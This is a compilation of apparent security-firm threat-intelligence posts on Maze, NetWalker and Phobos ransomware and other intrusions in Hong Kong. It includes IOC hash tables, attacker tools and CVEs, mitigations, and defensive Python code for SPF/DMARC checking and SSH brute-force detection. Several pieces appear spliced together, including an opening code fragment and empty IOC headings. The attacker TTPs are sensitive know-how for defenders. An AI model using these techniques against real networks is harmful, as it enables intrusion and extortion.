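    if "rua" not in tags:
        findings.append(("low", "no rua= address: nobody receives aggregate reports"))
    return findings


def spoofing_exposure(spf_record, dmarc_record):
    """Roll all findings up to the worst severity: 'high', 'medium', 'low' or 'none'."""
    findings = assess_spf(spf_record) + assess_dmarc(dmarc_record)
    for level in ("high", "medium", "low"):
        if any(sev == level for sev, _ in findings):
            return level, findings
    return "none", findings


if __name__ == "__main__":
    for label, spf, dmarc in (("weak", WEAK_SPF, WEAK_DMARC), ("strong", STRONG_SPF, STRONG_DMARC)):
        level, findings = spoofing_exposure(spf, dmarc)
        print(f"{label}: exposure={level}")
        for sev, msg in findings:
            print(f"  [{sev}] {msg}")
```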

Indicators of Compromise

Email sender’s IP


Downloader Domains

Crypt ‘n’ Leak

New ransomware trend exploits vulnerability in Hong Kong’s VPNs

The fast pace of criminals’ innovation is an ever-recurring theme in cyber security. When the cybercriminal underground economy is particularly saturated, threat actors will likely be driven to explore new ways to differentiate their offering in the illicit cybercriminal market and increase revenue. This is what we are currently observing among ransomware operators. Many ransomware variants have been released in recent years. In the last several months, however, a smaller group of ransomware-as-a-service providers emerged with a new tactic to extort their victims.

DarkLab’s Threat Intelligence team is currently tracking multiple ransomware groups that, in addition to encrypting victims’ data, also steal sensitive files and threaten their public release if ransom demands are not met. The extortionists’ goal is to apply additional pressure on victims by threatening reputational damage and potential regulatory fines if sensitive data is leaked, on top of hindering systems availability.

DarkLab’s incident response team has observed multiple such incidents affecting Hong Kong organisations, highlighting how ransomware leak attacks are a significant and current threat for companies in the region as well as globally. DarkLab has experience in dealing with Maze and NetWalker ransomware attacks in Hong Kong. This article aims to first shed light on each malware’s background, and then to discuss some of the tactics, techniques, and procedures (TTPs) we observed in our incident response investigations.

The RaaS model and its implications

Maze and NetWalker ransomware variants are developed by a core group of cybercriminals and then leased to other criminal operators, called affiliates, on deep and dark web forums. This model is usually referred to as ransomware-as-a-service (RaaS), where operators and developers share profits in an agreed percentage.

RaaS means that different operators of the same ransomware group can target multiple companies at the same time, regardless of their size or geographical location. Ransomware operators are independent actors, so they may differ in the attack tactics exploited. This makes the job of network defenders more challenging because of the larger set of potential tactics, techniques, and procedures (TTPs) to mitigate.

Some RaaS developers, like those of NetWalker, only accept affiliates with proven technical skills and existing access to multiple corporate networks. Stricter cybercriminal candidate screening is leading to an increase in targeted ransomware attacks exploiting external network systems. Exposed remote desktop protocol (RDP) and vulnerable internet-facing services are increasingly more likely entry points than untargeted phishing emails.

The rise of crypt and leak

Since the end of 2019, some ransomware groups have begun threatening to release sensitive victims’ data if their ransom demands are not met. Maze went a step further and set up a dedicated website to publicly shame victims and leak data. More groups, including NetWalker, are now maintaining their own leak websites on the clearnet or on Tor hidden services. DarkLab is currently tracking 13 ransomware leak websites, highlighting the rapidly increasing scale of this crypt and leak trend.

This new pressure tactic by ransomware operators has significant implications for companies. Previously, an efficient back-up policy would potentially guarantee a timely recovery from ransomware attacks. Now that ransomware groups also leak data, back-ups are not enough anymore. Organisations must ensure that sound cyber security hygiene is maintained at all times to prevent a ransomware intrusion from taking place at all.


Maze ransomware appeared in May 2019, but it began leaking victims’ data only in 2020. The group maintains two sites, one to publish victim data (see figure 1), the other to communicate with its victims and let them decrypt some test files (see figure 2). Both have a back-up Tor hidden service counterpart to avoid take down by law enforcement.

Figure 1 – redacted screenshot of Maze ransomware leak site

Figure 2 – Screenshot of Maze ransomware chat site

Figure 3 – Geography of Maze’s victims posted on their site

Figure 4 – Sectorial breakdown of Maze’s victims posted on their site


NetWalker ransomware is based on a previous variant called Mailto and was rebranded under its current name in March 2020, despite little change in its code. The developers of NetWalker recruit affiliates on Russian-language cybercriminal forums and particularly look for individuals with network intrusion experience. The group has allegedly been very successful since its inception. NetWalker developers claimed to have gained millions of US dollars since March, although it remains unclear whether this is just an exaggeration to attract more affiliates to their program or not.

NetWalker also operates a website that lists their victims and leaks their data. We noticed that the group behind NetWalker selectively deletes victims’ entries from their website over time, so the range of targeted organisations is likely more extensive than that presented in the graphs below.

Figure 5 – Redacted screenshot of NetWalker ransomware leak site

Figure 6 – Geographical breakdown of NetWalker’s victims posted on their site, more have likely been targeted and not posted online or deleted from existing victims’ list

Figure 7 – Sectorial breakdown of NetWalker’s victims posted on their site, more sectors have likely been targeted

Observed tactics, techniques, and procedures

DarkLab incident response investigations found that operators of both Maze and NetWalker exploited a known Pulse Secure VPN vulnerability – CVE-2019-11510 – to gain initial access to victims in Hong Kong. The same vulnerability has been exploited by multiple ransomware groups against other high profile targets, including by Sodinokibi against Travelex in January.

In both cases, the remote access technology SSLVPN was Active Directory (AD) authenticated, giving attackers a legitimate network account early on in their intrusion. Once inside the victim’s network, the attackers would conduct enumeration and other reconnaissance activities by, for instance, searching for password files in shared folders. The attackers would also actively look for idle and vulnerable servers with the intention of expanding their foothold.

During our investigations we found that both intruders used common hacking tools, although with some differences. Tools observed include Windows administration tools like PsExec, open source tools for lateral movement like CrackMapExec, PowerShell versions of Mimikatz and PowerView for credential theft, further enumeration and privilege escalation, as well as off-the-shelf network scanners.

The Maze and NetWalker operators eventually managed to obtain access to administrator accounts, which allowed them in both cases to disable anti-virus solutions on network end points. Similarly, creation of new domain administrator accounts allowed them persistence on the network. 

From such privileged positions the operators staged malware and other required artefacts on accessible locations in the victims’ networks, such as shared folders – for NetWalker – and NETLOGON folders – for Maze. We suspect that in both incidents scripts were used to automatically spread the ransomware in the network.

In the case of Maze, the deployment script would also disable endpoints’ protection software, and enable services, such as Windows Remote Management, that would allow re-entry. Maze operators also abused group policy objects (GPOs) to weaken their endpoint defences by changing configurations, and to redeploy the malware to new machines. The latter would ensure that the ransomware would also spread to endpoints after they shut down or if they joined the network at a later time.


The double extortion of crypt and leak groups and the growing trend of targeted attacks against external network infrastructure makes ransomware leaks one of the most significant threats to companies, regardless of sectors. The recent targeting of Hong Kong organisations by Maze and NetWalker also reaffirms how the SAR’s threat landscape is closely associated with threat trends worldwide.

Companies in Hong Kong should therefore adopt a proactive approach to review their security posture and avoid targeted network intrusions in the first place. Presence of timely back-ups can help restore system availability but it is not an effective mitigation against the increasing threat of ransomware data leak. Organisations should also focus on maintaining situational awareness on developments in the global threat landscape, as threats to companies abroad are likely to quickly become threats to Hong Kong organisations too.

Indicators of Compromise

Hash | File name | Description
c45ebccb7dc2bbc34c51c82c3eba6448 | apply.ps1 | Generates GPO package to disable AV, settings
16b5ddd25bb610270e52c1663931ef4c | system.dll | Maze ransomware
0e7d5d16e03393605f5f4862f1b9cc37 | crackmapexec.exe | Lateral movement tool
d6a246a98a0387e2a5f9d95ddd8ae164 | syspool.exe | Lightweight network scanner
696bb8648eceaa187cbc1f06205a23ce | city.exe | NetWalker ransomware
84ddf23d4307b1a9989352f4845d0ede | city.ps1 | NetWalker PowerShell script

Phobos ransomware

Incidents affecting Hong Kong organisations

In the last two months DarkLab Incident Response and Threat Intelligence teams observed multiple incidents in Hong Kong involving the Phobos ransomware variant.

There are no explicit indications that these incidents are part of a campaign targeting Hong Kong. Rather, they are likely due to Phobos’ prevalence in the cybercriminal underground. Nonetheless, the similarities in the observed tactics, techniques and procedures (TTPs), and in the ransomware deployed, prompted us to release this alert to help companies improve their timely detection and response to this threat.

Intrusions analysis

Phobos shares many similarities with the Dharma ransomware, and has been sold as ransomware-as-a-service on the cybercriminal underground since at least December 2018. This means that even low skilled threat actors can rent the malware from its developers and spread it via whatever means they have access to.

According to DarkLab’s incident investigations, exploitation of remote desktop protocol (RDP) servers and their credentials is the most common infection vector. In particular, we observed RDP bruteforcing and exploitation of weak password policies as the most frequent attack vectors. Such TTPs match previously reported instances of Phobos intrusions worldwide.

Once inside the victims’ network, we have seen criminals creating a local account with netplwiz, deploying a malicious network share scanner called 5-NS new.exe, and deleting event logs prior to executing the main payload.

Several hours after the initial intrusion threat actors triggered the ransomware in the form of a malicious executable. Other than encrypting the files, the ransomware also tampered with infected hosts to disable the firewall and other security configurations.


Attackers did not employ particularly sophisticated tradecraft and PwC was able to help clients contain the incidents quickly. Nonetheless, the intrusions impaired systems availability and created operational disruption among victim companies. This can be particularly damaging when most organisations’ staff connect remotely to the corporate network due to the COVID-19 pandemic.


To protect against ransomware incidents via RDP exploitation, DarkLab recommends that companies:

  • Ensure visibility over public-facing RDP servers via external scans
  • Limit exposure of public-facing systems whenever possible
  • Enforce use of multi-factor authentication for remote access, particularly RDP
  • Ensure your organisation has and follows an effective back-up policy

File name | MD5 | Description
20.09.2019Taskmgr.exe | b8351ba02dbce02292a01a6e85112e2b | Phobos ransomware
Mouse Lock_v22.exe | fc9c80e1767e1266056b1b2c89a74ce5 | Blocks mouse cursor on screen
5-NS new.exe | 597de376b1f80c06d501415dd973dcec | Network shares scanner

Cyber threats to Hong Kong

An incident response perspective

In the last two years, DarkLab has helped clients respond to, and recover from, numerous network intrusions. Our clients span a variety of sectors in Hong Kong and Macau, including financial services, real estate, telecommunications, and aviation, among others. The organisations we helped also varied greatly in size and cyber security maturity. Some employed just a handful of personnel with no dedicated security function, while others were large international organisations with an established CISO and security teams.

This range of incident response experience means that DarkLab is in a unique position to identify cyber threats to Hong Kong companies across multiple sectors. In this article, we share some of the threat trends we have observed first hand, and highlight effective mitigation methods companies can implement to thwart them.

Common attacks against companies in Hong Kong

In 2018, we were called in to help investigate a significant number of business email compromise (BEC) frauds against financial services companies. BEC frauds see threat actors sending emails to employees, often in the finance department, to instruct them to direct funds to a bank account that scammers control. For the fraud to work, the email needs to appear to originate from an internal, trusted email account.

While email spoofing is the simplest option for threat actors, in most of the incidents we observed threat actors instead directly compromised an email account. This allowed them to monitor their victim’s incoming emails and hijack an email thread to grant their fraudulent request greater credibility. While BEC scammers usually spent no more than a couple of days in their victim’s accounts, we saw one incident where their presence remained undetected for almost a week.

In 2019, the most common type of attacks were ransomware and cryptomining. Cryptomining incidents were mostly caused by automated botnets. Intrusions were often detected promptly by victims due to the unusually high CPU usage required to generate cryptocurrency.

Ransomware attacks instead showed a higher degree of stealth and manual lateral movement. For instance, in one ransomware intrusion the attackers operated in the infected network only outside standard office hours. By also exploiting living-off-the-land techniques, the intruders managed to remain unnoticed until the encryption routine was activated some 20 days later.

Threat intelligence suggests that last year ransomware and cryptomining threats were on the rise globally, showing how threats to Hong Kong closely follow global threat trends.

Main initial attack vectors exploited

The initial attack vectors for most incidents we investigated were abuse of internet-facing infrastructure, typically using brute-force attacks or stolen credentials to access servers with remote desktop protocol (RDP) or secure shell (SSH) enabled.

For instance, a client in the shipping industry had ten servers infected by the Anacron cryptomining malware. Upon investigation, we discovered attempted brute-force attacks against the same SSH server for almost a month, suggesting automated botnet activity. Once logged in, the malware spread to 10 additional servers that shared the same password as the infected web server.
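Sustained SSH password guessing of the kind described above leaves a clear trail in authentication logs if anyone is reading them. As an added example (not code from the original post or from DarkLab), the Python below scans constructed sshd log lines, flags a source IP once it reaches a threshold of failed logins inside a sliding time window, and records whether a successful login from that IP followed the burst, the pattern that precedes a guessed-credential compromise.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed sample sshd log lines (not from the incident): one source guesses
# passwords against the same server and eventually logs in; another is benign.
SAMPLE_AUTH_LOG = """\
Jan 03 02:14:01 web1 sshd[2201]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jan 03 02:14:03 web1 sshd[2203]: Failed password for invalid user admin from 203.0.113.7 port 51023 ssh2
Jan 03 02:14:05 web1 sshd[2205]: Failed password for root from 203.0.113.7 port 51024 ssh2
Jan 03 02:14:07 web1 sshd[2207]: Failed password for root from 203.0.113.7 port 51025 ssh2
Jan 03 02:14:09 web1 sshd[2209]: Failed password for root from 203.0.113.7 port 51026 ssh2
Jan 03 02:14:12 web1 sshd[2211]: Accepted password for root from 203.0.113.7 port 51027 ssh2
Jan 03 09:00:30 web1 sshd[2302]: Accepted password for alice from 198.51.100.4 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_events(log_text, year=2020):
    """Yield (timestamp, result, user, ip); syslog has no year, so one is assumed."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def find_brute_force(log_text, threshold=5, window_seconds=600):
    """Flag IPs with >= threshold failures in a sliding window; note a later success."""
    recent = defaultdict(list)     # ip -> failure timestamps still inside the window
    failures = defaultdict(int)    # ip -> total failures seen
    users = defaultdict(set)       # ip -> usernames tried
    alerts = {}
    for ts, result, user, ip in parse_events(log_text):
        window = recent[ip]
        window[:] = [t for t in window if (ts - t).total_seconds() <= window_seconds]
        if result == "Failed":
            window.append(ts)
            failures[ip] += 1
            users[ip].add(user)
            if len(window) >= threshold and ip not in alerts:
                alerts[ip] = {"ip": ip, "first_seen": ts, "login_after_failures": None}
        elif ip in alerts and len(window) >= threshold:
            # success right after a burst of failures: likely a guessed credential
            alerts[ip]["login_after_failures"] = (user, ts)
    for ip, a in alerts.items():
        a["failures"], a["users_tried"] = failures[ip], sorted(users[ip])
    return list(alerts.values())
```

On a real host, feed it the output of `journalctl -u ssh` or `/var/log/auth.log`; an alert with `login_after_failures` set is the case that warrants an immediate investigation rather than just a block rule.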

Ransomware infections that initiated on a public-facing RDP server were also relatively common. For instance, we responded to one such incident involving the Dharma/Crysis ransomware that was affecting a real estate development company.

In at least one case, however, a publicly available exploit enabled a ransomware attack against a company in the professional services sector. Attackers exploited a known vulnerability in Windows IIS (CVE-2017-7269) to gain initial access to a server used for testing, which had been left exposed to the internet. After stealing the credentials of multiple highly privileged IT accounts, the attacker compromised and encrypted 62 Windows servers, causing significant business disruption.

Espionage intrusions against organisations in Hong Kong

Although less numerous, we also witnessed prolonged and organised network intrusions against companies in Hong Kong carried out by skilled threat actors.

In an incident in late 2019, we responded to a supply-chain compromise carried out by a likely espionage group against a Hong Kong client in the aviation sector. The attacker targeted a subsidiary of the client by exploiting an unpatched firewall vulnerability to obtain valid VPN credentials. Once inside the victim’s network, the threat actor conducted extensive reconnaissance and staged various tools on internal servers. These included the credential-dumping tool Mimikatz, NBTScan for network scanning, and PsExec for lateral movement.

After more than a month in the subsidiary’s network, the threat actor exploited the trusted connection with the main organisation’s network to move across into it. Fortunately, the intrusion into the main organisation’s network was detected in time and did not result in the exfiltration of data. Nonetheless, we saw similar tactics, techniques and procedures used against another Hong Kong critical national infrastructure company in 2018. This suggests that espionage threat actors continue to pose a threat to Hong Kong organisations in strategic sectors.

Effective mitigation methods

Despite the range of potential threats to companies in Hong Kong, cyber security best practices and common hygiene methods can help deter a significant portion of the cyber attacks we observed.

To improve your organisation’s resilience to cyber attacks, we suggest that you:

  • Enforce the use of multi-factor authentication for remote access
  • Restrict domain admin rights
  • Limit exposure of public-facing systems
  • Ensure that best practices for network segmentation are observed
  • Conduct regular security awareness training for IT and non-IT staff
  • Perform regular cyber attack simulations to ensure resiliency
  • Consider establishing or outsourcing a Security Operations Centre (SOC) for security log monitoring and threat hunting
  • Ingest timely cyber threat intelligence feeds and reporting for proactive defence against upcoming threats